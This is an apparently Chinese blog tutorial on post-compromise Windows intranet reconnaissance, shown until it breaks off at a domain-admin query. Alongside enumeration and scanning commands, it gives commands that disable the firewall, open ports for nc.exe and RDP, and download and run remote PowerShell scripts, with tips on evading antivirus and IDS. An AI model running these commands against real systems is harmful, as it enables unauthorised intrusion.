<!DOCTYPE HTML>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta name="keywords" content="内网第二章-内网基础信息搜集, 浮生">
    <meta name="description" content="侠之大者，为国为民">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>内网第二章-内网基础信息搜集 | 浮生</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">浮生</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">浮生</div>
        <div class="logo-desc">
            
            侠之大者，为国为民
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/shuai06" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/shuai06" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/5.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">内网第二章-内网基础信息搜集</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    .toc-fixed .toc-link::before{
        position: fixed!important;/*当toc的位置改为fixed时，.toc-link::before也要改为fixed*/
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/渗透测试/">
                                <span class="chip bg-color">渗透测试</span>
                            </a>
                        
                            <a href="/tags/信息搜集/">
                                <span class="chip bg-color">信息搜集</span>
                            </a>
                        
                            <a href="/tags/内网/">
                                <span class="chip bg-color">内网</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/渗透测试/" class="post-category">
                                渗透测试
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2020-05-08
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    7.1k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    27 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="二-内网信息收集"><a href="#二-内网信息收集" class="headerlink" title="二 . 内网信息收集"></a>二 . 内网信息收集</h1><h4 id="本机信息收集"><a href="#本机信息收集" class="headerlink" title=" 本机信息收集 "></a><font color="red"> 本机信息收集 </font></h4><p><strong>1)查询网络配置</strong></p>
<pre><code>net view    # 查看工作组

ipconfig /all   # 也可以看到是否有域
</code></pre><p><strong>2) 查询用户列表</strong></p>
<pre><code>net user   # 查看本机用户列表
net localgroup administrators   # 本机管理员（通常含有域用户）
query user || qwinsta   # 查看当前在线用户（提前看看管理员是否在线）

# 企事业单位的用户名有规则性

</code></pre><p><strong>3)查询进程列表</strong></p>
<pre><code># 看装了什么软件,vpn,杀毒软件,虚拟机,某服务(推敲域内是否都装了这个软件)
# 看进程运行的权限

tasklist /v
# 或用wmic
wmic process list brief
</code></pre><p><strong>4) 查看本机服务信息</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash">wmic <span class="token function">service</span> list brief
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><strong>5) 查询操作系统及安装软件版本信息</strong></p>
<pre><code># 获取操作系统和版本信息()
systeminfo |findstr /B /C:"OS Name" /C:"OS Version"   # 英文版本的话是这样
systeminfo |findstr /B /C:"OS 名称" /C:"OS 版本"       # 中文版本的话是这样


# 查看系统体系结构
echo  %PROCESSOR_ARCHITECTURE%  # amd64

# 查看安装软件和版本、路径等
wmic product get name,version
# powershell查看安装软件信息
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"
</code></pre><p><strong>6) 查询端口列表</strong></p>
<pre><code>netstat -ano

# 根据端口综合判断，如果是内容用来更新的服务器/DNS服务器/代理服务器
</code></pre><p><strong>7) 查询启动信息</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash">wmic startup get command,caption
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><strong>8) 查看计划任务</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash">schtasks /query /fo LIST /v
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><strong>9) 查看主机开机时间</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash">net statistics workstation
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><strong>10) 列出或断开本地计算机与所连接的客户端之间的会话</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash">net session
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><strong>11) 查询补丁信息</strong></p>
<pre><code>systeminfo   #可以看到很多信息(域内主机补丁是批量打的)

# 或用wmic
wmic qfe get Caption,Description,HostFixID,InstalledOn
</code></pre><p><strong>12) 查询本机共享</strong></p>
<pre><code># 默认是开着C，IPC，ADMINS
# 不单单是看本机的信息(通过本机判断域内情况)
net share

net share \\yourHostname

wmic share get name,path,status

# wmic： 是windows自带的一个命令工具，有很多功能(交互/非交互模式)
</code></pre><p><strong>13) 查询路由表和所有可用的ARP缓存表</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash">route print

<span class="token comment" spellcheck="true">#</span>
arp -a
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>14) 查询防火墙配置</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># '查看'防火墙配置</span>
netsh firewall show config


<span class="token comment" spellcheck="true">## '关闭'防火墙(msf里面也有)</span>
<span class="token comment" spellcheck="true">#1.对win server 2003以及之前的版本</span>
netsh firewall <span class="token keyword">set</span> opmode disable
<span class="token comment" spellcheck="true">#2.win server 2003之后的版本</span>
netsh advfirewall <span class="token keyword">set</span> allprofiles state off 


<span class="token comment" spellcheck="true"># 自定义防火墙日志储存位置</span>
netsh advfirewall <span class="token keyword">set</span> currentprofile logging filename <span class="token string">"C:\windows\temp/fw.log"</span>

<span class="token comment" spellcheck="true">## '修改'防火墙相关配置(比关闭防火墙动静小，改完记得恢复规则)</span>
<span class="token comment" spellcheck="true">#1.对win server 2003以及之前的版本,允许指定程序全部连接</span>
netsh firewall add allowprogram c:\nc.exe <span class="token string">"allow nc"</span> <span class="token function">enable</span>

<span class="token comment" spellcheck="true">#2.win server 2003之后的版本</span>
允许指定程序连入
netsh advfirewall firewall add rule name<span class="token operator">=</span><span class="token string">"pass nc"</span> dir<span class="token operator">=</span>in action<span class="token operator">=</span>allow program<span class="token operator">=</span><span class="token string">"C: \nc.exe"</span>
允许指定程序连出
netsh advfirewall firewall add rule name<span class="token operator">=</span><span class="token string">"Allow nc"</span> dir<span class="token operator">=</span>out action<span class="token operator">=</span>allow program<span class="token operator">=</span><span class="token string">"C: \nc.exe"</span>
允许3389端口放行
netsh advfirewall firewall add rule name<span class="token operator">=</span><span class="token string">"Remote Desktop"</span> protocol<span class="token operator">=</span>TCP dir<span class="token operator">=</span>in localport<span class="token operator">=</span>3389  action<span class="token operator">=</span>allow 
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>15) 查看代理配置情况</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash">reg query <span class="token string">"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"</span>

<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><strong>16) 查询并开启远程连接服务（比较老的知识点）</strong></p>
<pre><code>##### 查看远程连接端口
Reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber


###### 开启的3389方法：
# 1.通用 开3389(优化后)：
  wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

# 2.For Win2003:
  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  # 或者
  wimc path win32_terminalservicesetting where (__CLASS !="") call setallowsconnections 1

# 3.For Win2008:
  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

# 4.For Every:
  cmd开3389 win08 win03 win7 win2012 winxp
  # win08，三条命令；win2012通用；win7前两条即可(权限需要run as administrator):
  wmic /namespace:\root\cimv2 erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
  wmic /namespace:\root\cimv2 erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
</code></pre><p><strong>17) 自动化信息搜集</strong></p>
<ul>
<li>写一个脚本，把上面要搜集的信息都进行</li>
<li>WMIC(win管理工具命令行)的搜集信息的写好的脚本(执行该脚本后，会自动生成一个html文件) <a href="http://www.fuzzysecurity.com/scripts/files/wmic_info.rar" target="_blank" rel="noopener">链接</a></li>
</ul>
<p><strong>18) Empire下的主机信息搜集</strong><br>1.Empire提供了用于收集主机信息的模块，输入命令<code>usemodoule situational_awareness/host/winenum</code>即可看到一些信息<br>2.<code>usemodoule situational_awareness/host/computerdetails</code> 包含了几乎所有有用的东西(但是运行这个模块需要管理员权限)</p>
<h4 id="查询当前权限"><a href="#查询当前权限" class="headerlink" title=" 查询当前权限 "></a><font color="red"> 查询当前权限 </font></h4><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">whoami</span>    <span class="token comment" spellcheck="true"># 查询当前权限</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><strong>获取到一台主机的权限后，有如下三种情况：</strong></p>
<ul>
<li>本地普通用户</li>
<li>本地管理员用户     （可以用来查询域内信息, 比如： <code>net view /xx/yy</code>）</li>
<li>域内用户(域名\用户)</li>
</ul>
<p>本地管理员权限默认和直接提升为Ntauthority或System权限，因此，在域中，除普通用户外，所有的机器都有一个机器用户(用户名是机器名+$)。本质上，机器的system用户对应的就是域里面的机器用户，所以使用system权限可以运行域内的查询命令  </p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">whoami</span> /all    <span class="token comment" spellcheck="true"># 获取域SID  </span>
net user xxx /domain  <span class="token comment" spellcheck="true"># 查询指定用户的详细信息</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<h4 id="判断是否存在域"><a href="#判断是否存在域" class="headerlink" title=" 判断是否存在域 "></a><font lor="red"> 判断是否存在域 </font></h4><p>如果存在域，就需要判断所控主机是否在域内  </p>
<p>几种方法：</p>
<pre><code># 1.
ipconfig /all  # 可以查看网关IP地址、DNS的ip地址、域名、本机是否和dns处在同一网段
# 然后，可以通过nslookup反解析域名的ip地址，用解析得到的ip地址进行对比，判断DC和DNS是否在同一台服务器上


# 2.查看系统详细信息(有"域"的字段)，如果"域"为WORKGROUP则表示当前服务器不在域内
systeminfo 


# 3.查询当前登录域及登录用户信息("工作站域DNS名称"为域名，如果为WORKGROUP则表示当前为非域环境)
# "登录域"表示当前登录的用户是域用户还是本地用户
net config workstation


# 4.判断主域(域服务器通常会作为时间服务器使用)
net time /domain
    # 三种情况：
    1.存在域，当前用户不是域用户
    2.存在域，当前用户是域用户
    3.当前网络环境为工作组，不存在域

</code></pre><h4 id="域内存活主机探测"><a href="#域内存活主机探测" class="headerlink" title=" 域内存活主机探测 "></a><font color="red"> 域内存活主机探测 </font></h4><ol>
<li>避免除法防病毒软件报警</li>
<li>不要使用暴力的;</li>
<li>不要使用图形化的工具</li>
<li>使用powershell/vbs等自带的</li>
<li>白天上班时间探测一遍，深夜分别探测一遍（对比分析存活主机对应的IP地址i）</li>
</ol>
<p><strong>1.利用<code>netbios</code>快速探测</strong>   （优先使用这个协议,会被认为是正常的通信）<br>工具：<code>nbtbios</code><br>使用方法</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># win和Linux下都有</span>

<span class="token comment" spellcheck="true"># 这里用win版本的，上传到目标主机(推荐放到目标机器的windows/temp下面)</span>
nbtscan.exe 192.168.111/24
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p>参数说明(结果的第三列)：</p>
<p><img src="http://image.xpshuai.cn/20200307145109927_29873.png"></p>
<p><strong>2.利用<code>icmp</code>协议快速探测内网</strong><br>工具：<br>1.ping命令:</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># for循环ping整个网段</span>
<span class="token keyword">for</span> /L %l <span class="token keyword">in</span> <span class="token punctuation">(</span>1,1,254<span class="token punctuation">)</span> Do @ping -w 1 -n 192.168.111.%l <span class="token operator">|</span>findstr <span class="token string">"TTL="</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>2.VBS脚本</p>
<pre class="line-numbers language-bash"><code class="language-bash">没写

<span class="token comment" spellcheck="true"># cscript xxx.vbs 运行脚本</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><strong>3.利用<code>arp</code>扫描完整探测内网</strong><br>工具：<br>1.arp-scan </p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 上传arp.exe 到目标机器运行</span>
Arp.exe -t 192.168.0/20
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>2.Empire中的arpscan模块</p>
<pre class="line-numbers language-bash"><code class="language-bash">usemodule situational_awareness/net/work/arpscan
<span class="token keyword">set</span> <span class="token punctuation">..</span>.
execute
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>3.NiShang里面的脚本: <code>Invoke-ARPScan.ps1</code> </p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># a.远程下载运行</span>
powershell -nop -exec bypass -c <span class="token string">"IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.1/Invoke-ARPScan.ps1');Invoke-ARPScan -CIDR 192.168.1.0/20"</span> <span class="token operator">>></span> C:\windows\temp\log.txt

<span class="token comment" spellcheck="true"># b.本地运行(先上传脚本到目标)</span>
powershell.exe -nop -exec bypass -Command <span class="token string">"&amp;{Import-Module C:\windows\temp\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/20}"</span> <span class="token operator">>></span> C:\windows\temp\log.txt

<span class="token comment" spellcheck="true"># c.无条件运行(没痕迹)</span>

<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>3.利用常规<code>tcp/udp端口扫描</code>探测内网<br>工具：<code>scanline</code>   (比较老, 但是好用，可在所有win版本使用，动静小)</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># -t 是tcp端口， -u是udp端口</span>
sl -h -t 22,80-89,110,389,445,3389,1099,1433,6379,27017,7001,8080,1521,3306,5432 -u 53,161,137,139 -O c:\windows\temp\sl_res.txt -p 192.168.1.1-254 /b

<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h4 id="扫描域内端口"><a href="#扫描域内端口" class="headerlink" title=" 扫描域内端口 "></a><font color="red"> 扫描域内端口 </font></h4><p>通过端口，不仅能了解目标主机所开放的服务，还能找出其开放服务的漏洞、分析目标网络的拓扑结构等</p>
<ul>
<li>端口的banner信息</li>
<li>端口上运行的服务</li>
<li>常见应用的默认端口</li>
</ul>
<p><strong>工具：</strong></p>
<ul>
<li>1.telent命令(针对单个，肯定不会触发报警)<pre class="line-numbers language-bash"><code class="language-bash">telnet DC1 22  <span class="token comment" spellcheck="true"># 查看某台主机某个端口是否开放</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</li>
<li>2.S扫描器<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 早期的工具，支持大网段</span>
S.exe TCP 192.168.1.1 192.168.1.112  22,445,3389,1433,6379,8080,80,23,21,25,110,3306,1521,111,445,7001  256  /Banner /save
<span class="token comment" spellcheck="true"># 结果默认保存在安装目录下的result.txt文件中</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
</li>
<li>3.Metasploit内置的端口扫描模块:<pre class="line-numbers language-bash"><code class="language-bash">search portscan
use auxiliary/scanner/portscan/tcp  <span class="token comment" spellcheck="true"># 还有其他模块</span>
<span class="token keyword">set</span> <span class="token punctuation">..</span>.
run
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
</li>
<li>4.PowerSploit下的<code>Invoke-portscan.ps1</code>脚本 (不会下载到本地)<pre class="line-numbers language-bash"><code class="language-bash">powershell -nop -exec bypass -c <span class="token string">"IEX(New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1');Invoke-portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,5432,8080,3389,22' -oA C:\windows\temp\log.txt"</span> 
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</li>
<li>5.NiShang的<code>Invoke-PortScan</code>模块<pre class="line-numbers language-bash"><code class="language-bash">Get-Help Invoke-PortScan -full
<span class="token comment" spellcheck="true"># ResolveHost 解析主机名</span>
Invoke-PortScan -StartAddress 192.168.0.1 -StopAddress 192.168.0.255 -ResolveHost
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
</li>
<li>6.nmap</li>
<li>7.masscan</li>
<li>8.其他端口扫描工具</li>
</ul>
<blockquote>
<p>注意扫描是否会触发IDS等设备</p>
</blockquote>
<p><strong>端口Banner信息</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash">通过扫描发现了端口，可以使用客户端连接工具或nc，获取服务端的Banner信息 
获取Banner信息之后，可以在漏洞库中查找相应的CVE编号的POC/Exp, 在Exploit-DB、Seebug、安全焦点的BugTraq 等平台查看相关漏洞利用工具，然后到目标系统中验证漏洞是否存在，从而有针对性地进行安全加固
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><strong>常见端口机器攻击方向</strong>：<br><a href="http://www.xpshuai.cn/01-信息搜集/#4.%20收集常用端口信息">链接</a></p>
<h4 id="收集域内基础信息"><a href="#收集域内基础信息" class="headerlink" title=" 收集域内基础信息 "></a><font color="red"> 收集域内基础信息 </font></h4><pre><code># 域用户才有权限进行以下查询（本机的system权限也可以，机器的用户名+$）

# 查询域
net view /domain  
# 查询域内所有计算机(可通过主机名对主机角色进行初步判定, 比如web可能是web服务器)
net view /domain:domainName   
net view /domain:WORKGROUP   

# 查看域内所有用户组
net group /domain    

# 查看域成员计算机列表
net group "domain computers" /domain   

# 获取域密码信息(密码策略,密码长度,错误锁定等信息)
net accounts /domain   

#  获取域信任信息
nltest /domain_trusts  
</code></pre><h4 id="查找-域控制器-DC"><a href="#查找-域控制器-DC" class="headerlink" title="查找 域控制器(DC) "></a><font color="red">查找 域控制器(DC) </font></h4><pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 查看DC的机器名</span>
nltest /DCLIST:xxx

<span class="token comment" spellcheck="true"># 查看DC的主机名</span>
<span class="token function">nslookup</span> -type<span class="token operator">=</span>SRV _ldap._tcp

<span class="token comment" spellcheck="true"># 查看当前时间</span>
net <span class="token function">time</span> /domain

<span class="token comment" spellcheck="true"># 查看域控制器组</span>
net group <span class="token string">"Domain Controllers"</span>/domain

netdom query pdc
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="域内用户和管理员的获取"><a href="#域内用户和管理员的获取" class="headerlink" title=" 域内用户和管理员的获取  "></a><font color="red"> 域内用户和管理员的获取  </font></h4><p>1.查询所有域用户列表：</p>
<pre><code>net user /doamin    # 向DC进行查询域用户列表
wmic useraccount get /all   # 获取域内用户详细信息
dsquery user  # 查看存在的用户
# 常用的dsquery命令
dsquery computer # 查找目录中的计算机
dsquery contact  # 查找目录中的联系人
dsquery subnet   # 查找目录中的子网
dsquery group    # 查找目录中的组
dsquery ou       # 查找目录中的组织单位
dsquery site     # 查找目录中的站点
dsquery user     # 查找目录中的用户
dsquery quota     # 查找目录中的配额规定
dsquery partition  # 查找目录中的分区
dsquery * -     # 用通用的 LDAP 查询来查找目录中的任何对象

net localgroup administrators  # 查询本地管理员组用户(实际中，为了方便管理，会有域用户被设置为域机器的本地管理员用户)
</code></pre><p>2.查询域管理员用户组</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 查询域管理员用户</span>
net group <span class="token string">"doamin admins"</span> /domain

<span class="token comment" spellcheck="true"># 查询域管理员用户组</span>
